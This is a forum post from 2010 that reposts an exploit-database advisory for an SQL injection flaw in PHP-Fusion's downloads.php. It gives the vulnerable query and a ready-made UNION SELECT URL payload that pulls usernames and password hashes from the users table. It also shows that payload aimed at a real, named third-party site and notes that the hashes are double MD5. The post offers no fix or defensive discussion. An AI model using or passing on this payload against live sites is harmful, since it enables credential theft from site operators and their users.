ANdreicj Posted March 14, 2010 Report Posted March 14, 2010 ===================================================================PHP-Fusion <= 6.01.15.4 (downloads.php) SQL Injection Vulnerability===================================================================1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 _ __ __ __ 11 /' \ __ /'__`\ /\ \__ /'__`\ 00 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 11 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 00 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 11 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 00 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 11 \ \____/ >> Exploit database separated by exploit 00 \/___/ type (local, remote, DoS, etc.) 11 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-1#[+] Discovered By : Inj3ct0r#[+] Site : Inj3ct0r.com#[+] support e-mail : submit[at]inj3ct0r.comProduct: PHP-Fusion Version: 6.01.15.4Dork : http://www.rus-phpfusion.com/news.php?readmore=32Error in file downloads.phpPHP code:$result = dbquery("SELECT * FROM ".$db_prefix."downloads WHERE download_id='$page_id'");A vulnerable parameter $ page_idExploit:downloads.php?page_id=-1%27+union+select+1,2,user_name,4,user_password,6,7,8,9,10,11,12,13,14,15,16,17+from+rusfusion_users+limit+0,1/*Example:http://efir-service.com/downloads.php?page_id=-1%27+union+select+1,2,user_name,4,user_password,6,7,8,9,10,11,12,13,14,15,16,17+from+rusfusion_users+limit+0,1/*password is encrypted by: md5 (md5 ($ pass)) Quote